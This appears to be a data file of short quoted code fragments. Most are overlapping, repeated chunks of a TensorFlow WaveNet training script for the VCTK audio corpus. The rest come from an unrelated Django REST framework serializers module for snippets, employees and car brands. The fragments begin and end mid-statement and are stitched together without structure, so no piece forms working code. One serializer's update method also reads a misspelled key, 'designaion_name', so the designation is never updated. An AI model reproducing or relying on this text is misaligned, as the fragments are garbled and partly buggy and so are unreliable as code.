"run_metadata = tf.compat.v1.RunMetadata() summaries = tf.compat.v1.summary.merge_all() # Set up session sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False))",
"corpus, which can be freely downloaded at the following site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html",
"TensorBoard. writer = tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata = tf.compat.v1.RunMetadata() summaries = tf.compat.v1.summary.merge_all() # Set",
"= str(ROOT_DIR / \"logdir\") checkpoint_every: int = 1000 num_steps: int = int(1e5) batch_size:",
"total=total, initial=saved_global_step + 1, desc=f'train (epoch-size={epoch_size}, #epoch={total // epoch_size})') for step in range(saved_global_step",
"= os.path.join(args.log_dir, 'timeline.trace') with open(timeline_path, 'w') as f: f.write(tl.generate_chrome_trace_format(show_memory=True)) else: summary, loss_value, _",
"= 1000 num_steps: int = int(1e5) batch_size: int = 1 sample_size: int =",
"run_metadata=run_metadata) writer.add_summary(summary, step) writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step)) tl = timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir, 'timeline.trace') with",
"can be freely downloaded at the following site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from",
"loss_value, _ = sess.run([summaries, loss, optim]) writer.add_summary(summary, step) pbar.update(1) pbar.set_postfix(step=step, loss=loss_value, epoch=step //",
"model_name = 'model.ckpt' checkpoint_path = os.path.join(logdir, model_name) print('Storing checkpoint to {} ...'.format(logdir), end=\"\")",
"= tf.compat.v1.RunMetadata() summaries = tf.compat.v1.summary.merge_all() # Set up session sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False)) init",
"end=\"\") ckpt = tf.train.get_checkpoint_state(logdir) if ckpt: print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path)) global_step = int(ckpt.model_checkpoint_path",
"1000 num_steps: int = int(1e5) batch_size: int = 1 sample_size: int = 100000",
"__name__ == '__main__': args = TrainParams() with open('./data/tf_wavenet_params.json', 'r') as f: wavenet_params =",
"None loss = net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable = tf.compat.v1.trainable_variables() optim = optimizer.minimize(loss, var_list=trainable)",
"writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step)) tl = timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir, 'timeline.trace') with open(timeline_path, 'w') as",
"saved_global_step = load(saver, sess, args.log_dir) if saved_global_step is None: # The first training",
"dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"], histograms=False, global_condition_channels=None, global_condition_cardinality=None) optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=1e-4, epsilon=1e-4)",
"residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"], histograms=False, global_condition_channels=None, global_condition_cardinality=None) optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=1e-4,",
"args.log_dir) if saved_global_step is None: # The first training step will be saved_global_step",
"site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from __future__ import print_function import argparse import glob",
"optim], options=run_options, run_metadata=run_metadata) writer.add_summary(summary, step) writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step)) tl = timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir,",
"os.path.join(logdir, model_name) print('Storing checkpoint to {} ...'.format(logdir), end=\"\") sys.stdout.flush() if not os.path.exists(logdir): os.makedirs(logdir)",
"return None def get_default_logdir(logdir_root): logdir = os.path.join(logdir_root, 'train', STARTED_DATESTRING) return logdir if __name__",
"loss, optim]) writer.add_summary(summary, step) pbar.update(1) pbar.set_postfix(step=step, loss=loss_value, epoch=step // epoch_size) if step >",
"// args.batch_size dataset = dataset.repeat().batch(args.batch_size) iterator = tf.compat.v1.data.make_initializable_iterator(dataset) audio_batch = iterator.get_next() if args.l2_regularization_strength",
"print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path)) global_step = int(ckpt.model_checkpoint_path .split('/')[-1] .split('-')[-1]) print(\" Global step was:",
"50 == 0: # Slow run that stores extra information for debugging. print('Storing",
"0 and step % args.checkpoint_every == 0: save(saver, sess, args.log_dir, step) last_saved_step =",
"print('Storing metadata') run_options = tf.RunOptions( trace_level=tf.RunOptions.FULL_TRACE) summary, loss_value, _ = sess.run( [summaries, loss,",
"if step > 0 and step % args.checkpoint_every == 0: save(saver, sess, args.log_dir,",
"end=\"\") saver.restore(sess, ckpt.model_checkpoint_path) print(\" Done.\") return global_step else: print(\" No checkpoint found.\") return",
"tqdm.auto import tqdm from wavenet_tf import WaveNetModel, optimizer_factory from wavenet_tf.data_io import get_train_dataset ROOT_DIR",
"tensorflow as tf from tensorflow.python.client import timeline from tqdm.auto import tqdm from wavenet_tf",
"if args.l2_regularization_strength == 0: args.l2_regularization_strength = None loss = net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable",
"1, args.num_steps): if args.store_metadata and step % 50 == 0: # Slow run",
"print(\" Done.\") return global_step else: print(\" No checkpoint found.\") return None def get_default_logdir(logdir_root):",
"model.\") raise step = None last_saved_step = saved_global_step try: total = args.num_steps -",
"pbar.update(1) pbar.set_postfix(step=step, loss=loss_value, epoch=step // epoch_size) if step > 0 and step %",
"= int(1e5) batch_size: int = 1 sample_size: int = 100000 learning_rate: float =",
"None last_saved_step = saved_global_step try: total = args.num_steps - saved_global_step - 1 pbar",
"here for new or overwritten trainings. saved_global_step = -1 except: print(\"Something went wrong",
"network with the WaveNet using data from the VCTK corpus, which can be",
"args.num_steps - saved_global_step - 1 pbar = tqdm( total=total, initial=saved_global_step + 1, desc=f'train",
"checkpoints from {} ...\".format(logdir), end=\"\") ckpt = tf.train.get_checkpoint_state(logdir) if ckpt: print(\" Checkpoint found:",
"// epoch_size) if step > 0 and step % args.checkpoint_every == 0: save(saver,",
"last_saved_step = saved_global_step try: total = args.num_steps - saved_global_step - 1 pbar =",
"own line. print() finally: if step > last_saved_step: save(saver, sess, args.log_dir, step) def",
"storing checkpoints of the model. saver = tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(), max_to_keep=args.max_checkpoints) try: saved_global_step = load(saver,",
"open(timeline_path, 'w') as f: f.write(tl.generate_chrome_trace_format(show_memory=True)) else: summary, loss_value, _ = sess.run([summaries, loss, optim])",
"= get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size) epoch_size = n_examples // args.batch_size dataset = dataset.repeat().batch(args.batch_size) iterator",
"from the VCTK corpus, which can be freely downloaded at the following site",
"print(\"Trying to restore saved checkpoints from {} ...\".format(logdir), end=\"\") ckpt = tf.train.get_checkpoint_state(logdir) if",
"= tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(), max_to_keep=args.max_checkpoints) try: saved_global_step = load(saver, sess, args.log_dir) if saved_global_step is None:",
"import os import sys import time from datetime import datetime from pathlib import",
"which can be freely downloaded at the following site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\"",
"> 0 and step % args.checkpoint_every == 0: save(saver, sess, args.log_dir, step) last_saved_step",
"import WaveNetModel, optimizer_factory from wavenet_tf.data_io import get_train_dataset ROOT_DIR = Path(os.path.abspath(__file__)).parent.parent STARTED_DATESTRING = \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now())",
"= dataset.repeat().batch(args.batch_size) iterator = tf.compat.v1.data.make_initializable_iterator(dataset) audio_batch = iterator.get_next() if args.l2_regularization_strength == 0: args.l2_regularization_strength",
"the following site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from __future__ import print_function import argparse",
"step) def save(saver, sess, logdir, step): model_name = 'model.ckpt' checkpoint_path = os.path.join(logdir, model_name)",
"else: print(\" No checkpoint found.\") return None def get_default_logdir(logdir_root): logdir = os.path.join(logdir_root, 'train',",
"sys import time from datetime import datetime from pathlib import Path import tensorflow",
"from {} ...\".format(logdir), end=\"\") ckpt = tf.train.get_checkpoint_state(logdir) if ckpt: print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path))",
"step) last_saved_step = step except KeyboardInterrupt: # Introduce a line break after ^C",
"print(\"Something went wrong while restoring checkpoint. \" \"We will terminate training to avoid",
"VCTK corpus, which can be freely downloaded at the following site (~10 GB):",
"= 0.0 max_checkpoints: int = 5 def train(args: TrainParams, net, optimizer): # Load",
"writer.add_summary(summary, step) pbar.update(1) pbar.set_postfix(step=step, loss=loss_value, epoch=step // epoch_size) if step > 0 and",
"run that stores extra information for debugging. print('Storing metadata') run_options = tf.RunOptions( trace_level=tf.RunOptions.FULL_TRACE)",
"step): model_name = 'model.ckpt' checkpoint_path = os.path.join(logdir, model_name) print('Storing checkpoint to {} ...'.format(logdir),",
"from wavenet_tf import WaveNetModel, optimizer_factory from wavenet_tf.data_io import get_train_dataset ROOT_DIR = Path(os.path.abspath(__file__)).parent.parent STARTED_DATESTRING",
"from __future__ import print_function import argparse import glob import json from dataclasses import",
"summaries = tf.compat.v1.summary.merge_all() # Set up session sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False)) init = tf.compat.v1.global_variables_initializer()",
"get_default_logdir(logdir_root): logdir = os.path.join(logdir_root, 'train', STARTED_DATESTRING) return logdir if __name__ == '__main__': args",
"Set up logging for TensorBoard. writer = tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata = tf.compat.v1.RunMetadata() summaries",
"== 0: save(saver, sess, args.log_dir, step) last_saved_step = step except KeyboardInterrupt: # Introduce",
"args.log_dir, step) def save(saver, sess, logdir, step): model_name = 'model.ckpt' checkpoint_path = os.path.join(logdir,",
"if ckpt: print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path)) global_step = int(ckpt.model_checkpoint_path .split('/')[-1] .split('-')[-1]) print(\" Global",
"int = 100000 learning_rate: float = 1e-4 max_to_keep: int = 5 store_metadata: bool",
"def get_default_logdir(logdir_root): logdir = os.path.join(logdir_root, 'train', STARTED_DATESTRING) return logdir if __name__ == '__main__':",
"sess, logdir, step): model_name = 'model.ckpt' checkpoint_path = os.path.join(logdir, model_name) print('Storing checkpoint to",
"skipped by specifying a threshold near dataset, n_examples = get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size) epoch_size",
"overwritten trainings. saved_global_step = -1 except: print(\"Something went wrong while restoring checkpoint. \"",
"sess, args.log_dir) if saved_global_step is None: # The first training step will be",
"int = int(1e5) batch_size: int = 1 sample_size: int = 100000 learning_rate: float",
"timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir, 'timeline.trace') with open(timeline_path, 'w') as f: f.write(tl.generate_chrome_trace_format(show_memory=True)) else: summary,",
"print(' Done.') def load(saver, sess, logdir): print(\"Trying to restore saved checkpoints from {}",
"is on its own line. print() finally: if step > last_saved_step: save(saver, sess,",
"sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False)) init = tf.compat.v1.global_variables_initializer() sess.run(init) sess.run(iterator.initializer) # Saver for storing checkpoints",
"0: save(saver, sess, args.log_dir, step) last_saved_step = step except KeyboardInterrupt: # Introduce a",
"be saved_global_step + 1, # therefore we put -1 here for new or",
"and step % 50 == 0: # Slow run that stores extra information",
"global_step=step) print(' Done.') def load(saver, sess, logdir): print(\"Trying to restore saved checkpoints from",
"'train', STARTED_DATESTRING) return logdir if __name__ == '__main__': args = TrainParams() with open('./data/tf_wavenet_params.json',",
"l2_regularization_strength: float = 0.0 max_checkpoints: int = 5 def train(args: TrainParams, net, optimizer):",
"terminate training to avoid accidentally overwriting \" \"the previous model.\") raise step =",
"not os.path.exists(logdir): os.makedirs(logdir) saver.save(sess, checkpoint_path, global_step=step) print(' Done.') def load(saver, sess, logdir): print(\"Trying",
"be freely downloaded at the following site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from __future__",
"dataset = dataset.repeat().batch(args.batch_size) iterator = tf.compat.v1.data.make_initializable_iterator(dataset) audio_batch = iterator.get_next() if args.l2_regularization_strength == 0:",
"1, # therefore we put -1 here for new or overwritten trainings. saved_global_step",
"^C is displayed so save message # is on its own line. print()",
"max_to_keep: int = 5 store_metadata: bool = False l2_regularization_strength: float = 0.0 max_checkpoints:",
"None: # The first training step will be saved_global_step + 1, # therefore",
"restore saved checkpoints from {} ...\".format(logdir), end=\"\") ckpt = tf.train.get_checkpoint_state(logdir) if ckpt: print(\"",
"'__main__': args = TrainParams() with open('./data/tf_wavenet_params.json', 'r') as f: wavenet_params = json.load(f) model",
"model. saver = tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(), max_to_keep=args.max_checkpoints) try: saved_global_step = load(saver, sess, args.log_dir) if saved_global_step",
"def train(args: TrainParams, net, optimizer): # Load raw waveform from VCTK corpus. with",
"tf.compat.v1.RunMetadata() summaries = tf.compat.v1.summary.merge_all() # Set up session sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False)) init =",
"checkpoint_path = os.path.join(logdir, model_name) print('Storing checkpoint to {} ...'.format(logdir), end=\"\") sys.stdout.flush() if not",
"= timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir, 'timeline.trace') with open(timeline_path, 'w') as f: f.write(tl.generate_chrome_trace_format(show_memory=True)) else:",
"load(saver, sess, args.log_dir) if saved_global_step is None: # The first training step will",
"str(ROOT_DIR / \"logdir\") checkpoint_every: int = 1000 num_steps: int = int(1e5) batch_size: int",
"var_list=trainable) # Set up logging for TensorBoard. writer = tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata =",
"dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"], histograms=False, global_condition_channels=None, global_condition_cardinality=None) optimizer",
"= WaveNetModel( batch_size=args.batch_size, dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"], histograms=False,",
"bool = False l2_regularization_strength: float = 0.0 max_checkpoints: int = 5 def train(args:",
"saved_global_step = -1 except: print(\"Something went wrong while restoring checkpoint. \" \"We will",
"writer.add_summary(summary, step) writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step)) tl = timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir, 'timeline.trace') with open(timeline_path,",
"following site (~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from __future__ import print_function import argparse import",
"Introduce a line break after ^C is displayed so save message # is",
"'step_{:04d}'.format(step)) tl = timeline.Timeline(run_metadata.step_stats) timeline_path = os.path.join(args.log_dir, 'timeline.trace') with open(timeline_path, 'w') as f:",
"the VCTK corpus, which can be freely downloaded at the following site (~10",
"trimming to be skipped by specifying a threshold near dataset, n_examples = get_train_dataset(os.path.join(args.data_dir,",
"WaveNetModel( batch_size=args.batch_size, dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"], histograms=False, global_condition_channels=None,",
"= None loss = net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable = tf.compat.v1.trainable_variables() optim = optimizer.minimize(loss,",
"avoid accidentally overwriting \" \"the previous model.\") raise step = None last_saved_step =",
"datetime import datetime from pathlib import Path import tensorflow as tf from tensorflow.python.client",
"except KeyboardInterrupt: # Introduce a line break after ^C is displayed so save",
"+ 1, # therefore we put -1 here for new or overwritten trainings.",
"0: # Slow run that stores extra information for debugging. print('Storing metadata') run_options",
"raise step = None last_saved_step = saved_global_step try: total = args.num_steps - saved_global_step",
"optimizer.minimize(loss, var_list=trainable) # Set up logging for TensorBoard. writer = tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata",
"int(1e5) batch_size: int = 1 sample_size: int = 100000 learning_rate: float = 1e-4",
"args.batch_size dataset = dataset.repeat().batch(args.batch_size) iterator = tf.compat.v1.data.make_initializable_iterator(dataset) audio_batch = iterator.get_next() if args.l2_regularization_strength ==",
"init = tf.compat.v1.global_variables_initializer() sess.run(init) sess.run(iterator.initializer) # Saver for storing checkpoints of the model.",
"metadata') run_options = tf.RunOptions( trace_level=tf.RunOptions.FULL_TRACE) summary, loss_value, _ = sess.run( [summaries, loss, optim],",
"[summaries, loss, optim], options=run_options, run_metadata=run_metadata) writer.add_summary(summary, step) writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step)) tl = timeline.Timeline(run_metadata.step_stats) timeline_path",
"pathlib import Path import tensorflow as tf from tensorflow.python.client import timeline from tqdm.auto",
"step % args.checkpoint_every == 0: save(saver, sess, args.log_dir, step) last_saved_step = step except",
"datetime from pathlib import Path import tensorflow as tf from tensorflow.python.client import timeline",
"with tf.name_scope('create_inputs'): # Allow silence trimming to be skipped by specifying a threshold",
"= tqdm( total=total, initial=saved_global_step + 1, desc=f'train (epoch-size={epoch_size}, #epoch={total // epoch_size})') for step",
"if saved_global_step is None: # The first training step will be saved_global_step +",
"Checkpoint found: {}\".format(ckpt.model_checkpoint_path)) global_step = int(ckpt.model_checkpoint_path .split('/')[-1] .split('-')[-1]) print(\" Global step was: {}\".format(global_step))",
"/ 'fma_small_25_16000') log_dir: str = str(ROOT_DIR / \"logdir\") checkpoint_every: int = 1000 num_steps:",
"summary, loss_value, _ = sess.run([summaries, loss, optim]) writer.add_summary(summary, step) pbar.update(1) pbar.set_postfix(step=step, loss=loss_value, epoch=step",
"return global_step else: print(\" No checkpoint found.\") return None def get_default_logdir(logdir_root): logdir =",
"sess.run(iterator.initializer) # Saver for storing checkpoints of the model. saver = tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(), max_to_keep=args.max_checkpoints)",
"// epoch_size})') for step in range(saved_global_step + 1, args.num_steps): if args.store_metadata and step",
"# Introduce a line break after ^C is displayed so save message #",
"the VCTK corpus. This script trains a network with the WaveNet using data"
"title = serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False) language = serializers.ChoiceField(",
"choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data): '''create and return a",
"= validate_data.get( 'designaion_name', instance.designation_name) instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks =",
"= serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES,",
"a serializer for the models so that state of model objects can be",
"SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta: model = Snippet fields = \"__all__\"",
"for Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model = CarBrands fields = '__all__'",
"Meta: model = Snippet fields = \"__all__\" # creating a serializer for Roles",
"serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) # validation for employee_name",
"be converted into a native python datatypes that can be easily rendered into",
"= '__all__' # creating serializer for list of all the names of employee",
"validate_data): '''create and return a new Snippet''' return Snippet.objects.create(**validate_data) def update(self, instance, validate_data):",
"slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) # validation for employee_name field",
"= \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True, allow_blank=False, max_length=100) def create(self, validate_data):",
"validation for employee_name field that it should contain mr or mrs def validate_employee_name(self,",
"instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self, user):",
"def create(self, validate_data): '''create and return a new Snippet''' return Snippet.objects.create(**validate_data) def update(self,",
"getting details of all the employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if len(value)",
"default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data): '''create and return a new",
"# creating a serializer for Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model =",
"serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data):",
"so that state of model objects can be converted into a native python",
"model objects can be converted into a native python datatypes that can be",
"= serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style =",
"= Employees fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True, allow_blank=False, max_length=100)",
"= \"__all__\" # creating a serializer for Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta:",
"= validate_data.get('style', instance.style) instance.save() return instance # SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class",
"and return a new Snippet''' return Snippet.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update",
"if len(value) != 10: raise serializers.ValidationError( \" contact should contain 10 digits only\")",
"model = CarBrands fields = '__all__' # creating serializer for list of all",
"# SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code",
"all the employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if len(value) != 10: raise",
"language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data): '''create",
"value): a = \"mr\" if a not in value.lower(): raise serializers.ValidationError( 'this employee",
"for Snippet model # SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title",
"def update(self, instance, validate_data): ''' Update and return an existing snippet''' instance.designation_name =",
"len(value) != 10: raise serializers.ValidationError( \" contact should contain 10 digits only\") designations",
"instance.code) instance.linenos = validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language', instance.language) instance.style = validate_data.get('style', instance.style)",
"import serializers from .models import CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks",
"models so that state of model objects can be converted into a native",
"designation_name = serializers.CharField( required=True, allow_blank=False, max_length=100) def create(self, validate_data): '''create and return a",
"for getting details of all the employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if",
"instance.style) instance.save() return instance # SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta: model",
"= serializers.CharField(validators=[length]) # validation for employee_name field that it should contain mr or",
"'__all__' # creating serializer for list of all the names of employee in",
"a not in value.lower(): raise serializers.ValidationError( 'this employee name should contain Mr or",
"serializers.ValidationError( \" contact should contain 10 digits only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True)",
"Update and return an existing snippet''' instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name) instance.save() return",
"length(self, value): if len(value) != 10: raise serializers.ValidationError( \" contact should contain 10",
"class Meta: model = Employees fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField(",
"class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if len(value) != 10: raise serializers.ValidationError( \" contact",
"using 'serializers' class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template':",
"[\"employee_name\"] # creating a serialzer for getting details of all the employees class",
"= \"mr\" if a not in value.lower(): raise serializers.ValidationError( 'this employee name should",
"into JSON,XML''' from rest_framework import serializers from .models import CarBrands, EmployeeDesignations, Employees, Snippet,",
"'''create and return a new Snippet''' return Snippet.objects.create(**validate_data) def update(self, instance, validate_data): '''",
"native python datatypes that can be easily rendered into JSON,XML''' from rest_framework import",
"in value.lower(): raise serializers.ValidationError( 'this employee name should contain Mr or Mrs') return",
"CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks # creating a serializer for",
"Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model = Employees fields = [\"employee_name\"] # creating",
"raise serializers.ValidationError( 'this employee name should contain Mr or Mrs') return value class",
"create(self, validate_data): '''create and return a new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self, instance,",
"style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data): '''create and return a new Snippet'''",
"EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True, allow_blank=False, max_length=100) def create(self, validate_data): '''create and return",
"converted into a native python datatypes that can be easily rendered into JSON,XML'''",
"should contain Mr or Mrs') return value class Meta: model = Employees fields",
"= validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language', instance.language) instance.style = validate_data.get('style', instance.style) instance.save() return",
"can be converted into a native python datatypes that can be easily rendered",
"= validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language', instance.language) instance.style =",
"update(self, instance, validate_data): ''' Update and return an existing snippet''' instance.title = validate_data.get('title',",
"Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks # creating a serializer for Snippet model #",
"Snippet.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return an existing snippet''' instance.title",
"Meta: model = CarBrands fields = '__all__' # creating serializer for list of",
"max_length=100) def create(self, validate_data): '''create and return a new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def",
"class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model = Employees fields = [\"employee_name\"] # creating a",
"'textarea.html'}) linenos = serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly')",
"instance.code = validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language', instance.language) instance.style",
"or mrs def validate_employee_name(self, value): a = \"mr\" if a not in value.lower():",
"update(self, instance, validate_data): ''' Update and return an existing snippet''' instance.designation_name = validate_data.get(",
"serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) # validation for employee_name field that it should contain",
"validate_employee_name(self, value): a = \"mr\" if a not in value.lower(): raise serializers.ValidationError( 'this",
"snippet''' instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name) instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer):",
"an existing snippet''' instance.title = validate_data.get('title', instance.title) instance.code = validate_data.get('code', instance.code) instance.linenos =",
"validate_data.get('language', instance.language) instance.style = validate_data.get('style', instance.style) instance.save() return instance # SnippetSerializer using 'ModelSerializer'",
"value class Meta: model = Employees fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name =",
"raise serializers.ValidationError( \" contact should contain 10 digits only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\",",
"STYLE_CHOICES, Persons, PersonTasks # creating a serializer for Snippet model # SnippetSerializer using",
"Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model = CarBrands fields = '__all__' #",
"= serializers.CharField( required=True, allow_blank=False, max_length=100) def create(self, validate_data): '''create and return a new",
"return instance # SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta: model = Snippet",
"model = Employees fields = [\"employee_name\"] # creating a serialzer for getting details",
"<reponame>anuragrawat19/django_restframework '''writing a serializer for the models so that state of model objects",
"validate_data.get('title', instance.title) instance.code = validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language',",
"def create(self, validate_data): '''create and return a new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self,",
"a serializer for Snippet model # SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer): id =",
